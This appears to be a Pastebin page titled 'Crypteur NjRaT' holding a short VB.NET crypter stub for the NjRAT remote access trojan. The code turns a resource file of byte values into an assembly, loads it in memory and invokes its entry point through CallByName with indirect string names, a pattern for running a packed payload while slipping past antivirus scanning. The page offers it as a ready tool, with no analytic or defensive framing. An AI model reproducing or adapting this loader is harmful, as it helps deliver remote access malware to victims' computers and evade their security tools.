Advertisement
hackerfree

Crypteur NjRaT

Mar 13th, 2018
777
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 0.64 KB | None | 0 0
  1. Public Class Form1
  2.  
  3. Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles myBase.Load
  4. RichTexBox1.Text = My.Resources.NOM-DE-VOTRE-FICHIER
  5. Dim aa As String() = RichTexBox1.Lines
  6. Dim bb(aa.Length - 1) As Byte
  7. Dim cc As Integer = 0
  8. 'So
  9. For Each line In aa
  10. bb(cc) = Val(line.ToString)
  11. cc += 1
  12. Next
  13. 'clean entry point
  14. Dim red0 As String = "Entrypoint"
  15. Dim red1 As String = "invoke"
  16. Dim red3 As Object = AppDomain.CurrentDomain.Load(bb)
  17. Dim red4 As Object = Interaction.CallByName(red3, red0, CallType.Get)
  18. Dim red5 As Object = Interaction.CallByName(red4, red1, CallType.Method, Nothing, Nothing)
  19. End Sub
  20. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement